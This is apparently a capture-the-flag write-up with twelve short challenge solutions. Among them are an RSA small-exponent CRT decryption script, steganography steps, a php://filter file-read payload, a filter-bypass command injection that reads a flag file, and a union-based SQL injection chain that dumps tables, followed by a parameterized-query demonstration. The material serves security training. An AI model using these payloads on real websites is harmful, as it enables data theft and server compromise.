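1. Senior's Birthday
Brute-force this one with Burp Suite: capture the request, send it to Intruder to run the brute-force, then send it to Repeater to find the flag. The value is four digits, so in the payload settings choose the Numbers type, from 0000 to 1231.
2. EZ-RSA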
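from Crypto.Util.number import *
import gmpy2

flag = 'flag{*********************************}'
m = bytes_to_long(flag.encode())

def getN():
    # fresh 512-bit modulus from two random 256-bit primes
    p = getPrime(256)
    q = getPrime(256)
    n = p * q
    return n

# the same unpadded message is encrypted with e = 3 under three different moduli
e = 0x3
n1 = getN()
c1 = pow(m, e, n1)
n2 = getN()
c2 = pow(m, e, n2)
n3 = getN()
c3 = pow(m, e, n3)
print("n=", [n1, n2, n3])
print("c=", [c1, c2, c3])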
'''
n= [5567000486226353254524673454357147076118077122275789480555238584552332526459181641567858429587222587683345901310468140782420858931709570476562698953112801, 6982887363645354856540867035629441781549999700006363403940951376485517460506822033812812263179663875843737953430050436453298336104404304183964162702612863, 5569628780521526092136759047774448808289588145127191213956593902336353172559905282602383716258500935021056393917971164303539941268395159953652768614304911]
c= [4112523544883480830903403452517516825703078902670926405984774762024235980767805538947466914193950835488469608756778569692190967901730207690525300247682815, 4181292472036270897593568708931413787888488621274030741130549434467976405476555130890722346319549396800183827305452019796119873044279138566837264814627098, 3857434270788621361517349247277347831953021241414984430770586220424214110700999615785879462771584952744049357875753754209006439028080870626012342467148773]
'''
Decryption script:
import binascii, gmpy2  # binascii converts between hex strings and bytes; gmpy2 provides big-integer arithmetic
n= [5567000486226353254524673454357147076118077122275789480555238584552332526459181641567858429587222587683345901310468140782420858931709570476562698953112801, 6982887363645354856540867035629441781549999700006363403940951376485517460506822033812812263179663875843737953430050436453298336104404304183964162702612863, 5569628780521526092136759047774448808289588145127191213956593902336353172559905282602383716258500935021056393917971164303539941268395159953652768614304911]
c= [4112523544883480830903403452517516825703078902670926405984774762024235980767805538947466914193950835488469608756778569692190967901730207690525300247682815, 4181292472036270897593568708931413787888488621274030741130549434467976405476555130890722346319549396800183827305452019796119873044279138566837264814627098, 3857434270788621361517349247277347831953021241414984430770586220424214110700999615785879462771584952744049357875753754209006439028080870626012342467148773]
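from functools import reduce  # folds a sequence into a single accumulated value

def CRT(mi, ai):  # Chinese Remainder Theorem, used to combine the ciphertexts in c; mi is the list of moduli, ai the list of ciphertexts
    assert (reduce(gmpy2.gcd, mi) == 1)  # the moduli must be coprime (greatest common divisor of 1)
    assert (isinstance(mi, list) and isinstance(ai, list))
    M = reduce(lambda x, y: x * y, mi)  # product M of all the moduli
    # one term per (modulus m, ciphertext a): a * (M // m) * the inverse of (M // m) modulo m
    ai_ti_Mi = [a * (M // m) * gmpy2.invert(M // m, m) for (m, a) in zip(mi, ai)]
    return reduce(lambda x, y: x + y, ai_ti_Mi) % M  # sum the terms and reduce modulo M to get the CRT result

e = 0x3  # public exponent
m = gmpy2.iroot(CRT(n, c), e)[0]  # iroot returns (integer root, exactness flag); [0] takes the integer root
print(binascii.unhexlify(hex(m)[2:].strip("L")))  # turn the plaintext integer's hex digits back into bytes to get the flag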
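3. Don't Try Brute Force
Scan the image with Stegsolve to find the key that opens the encrypted zip file. The zip contains a large amount of base64-encoded data; convert it to an image to get a QR code that is missing its finder patterns. Restore them with Photoshop or PowerPoint and scan the code to get the flag.
4. re1
Open the binary in IDA, find the main function, and press R and F5 to decompile it. Read through the resulting program: 3 replaces e and 0 replaces O. Apply the character substitution to get the flag.
5. Leave a Backdoor
Scan with the code-audit tool D盾 (D-Shield), then look at the POST in the file it flags to find the flag.
6. Fuck
Decode with base16, then base32, and finally Brainfuck to get the flag.
7. Senior's Travel Photo
Inspect the image with 010 Editor; the end of the file holds a base64-encoded password string, and decoding it gives half of the flag. Then carve the second image out of the file in Kali. Convert the 1607 from the hint to hexadecimal, convert the image's actual height of 800 to hexadecimal, search for the value and change it, and the other half of the flag becomes visible.
8. Come Listen to a Song
First download MP3Stego. There is also an image, whose camera model field reads pass. Put yunxi.mp3 in the same directory as MP3Stego, open a terminal, and run Decode -X -P pass yunxi.mp3 (pass is the password). The base64-encoded flag appears in that directory; decode it.
9. Gentle—sister
The page source shows that the parameter is passed via GET. Append ?My_paramater[]=1 to the URL to get the flag.
10. A Plain and Simple Page
The environment is a static page, so information gathering is needed: check the crawler policy file robots.txt, then visit 0e1G7.php. Build the payload from what it returns: G7=php://filter/convert.iconv.utf-8.utf-7/resource=flag.php (there are several ways to write it), then decode the base64.
11. Rceeee
A typical filter-bypass challenge. Following the hint, enter ?cmd=c\at/fl\ag | tee 1.txt, then open 1.txt.
12. Dou Zong Experts Are This Terrifying
This is an SQL injection challenge. First brute-force weak passwords, which gives the username admin and the password admin123.
Determine the injection type: ?id=-1')
Dump the database name: ?id=-1') union select 1,2,database() --+
Dump the tables: ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='xiti_sql' --+
Dump the columns: ?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag' --+
Dump the values: ?id=-1') union select 1,2,group_concat(flAg) from xiti_sql.flag --+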
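For challenge 12, the following added example (not part of the original write-up or the challenge's code) shows why the `')` payloads work against a string-built query and why a bound parameter stops them. It assumes the lookup wraps the id in `('...')`, uses SQLite in place of MySQL, and uses a constructed `users` table and sample flag value; the schema prefix is dropped from the payload because SQLite has no `xiti_sql` schema.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the challenge database (SQLite, not MySQL).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'placeholder-hash');
        CREATE TABLE flag(flAg TEXT);
        INSERT INTO flag VALUES ('flag{constructed_sample}');
    """)
    return db

def lookup_vulnerable(db, user_id):
    # Assumed query shape: the ') in the payloads implies the id sits inside ('...').
    # Concatenation lets the input close the literal and append its own UNION.
    sql = "SELECT id, username, password FROM users WHERE id=('" + user_id + "')"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    # The driver binds user_id as one value; it is never parsed as SQL text.
    sql = "SELECT id, username, password FROM users WHERE id = ?"
    return db.execute(sql, (user_id,)).fetchall()

# Final payload from the write-up, URL-decoded ("--+" becomes "-- ").
PAYLOAD = "-1') union select 1,2,group_concat(flAg) from flag -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", lookup_vulnerable(db, PAYLOAD))
    print("parameterized:", lookup_parameterized(db, PAYLOAD))
    print("normal lookup:", lookup_parameterized(db, "1"))
```

With the bound parameter the whole payload is compared to `id` as a single string, so it matches no row, while a legitimate id still resolves.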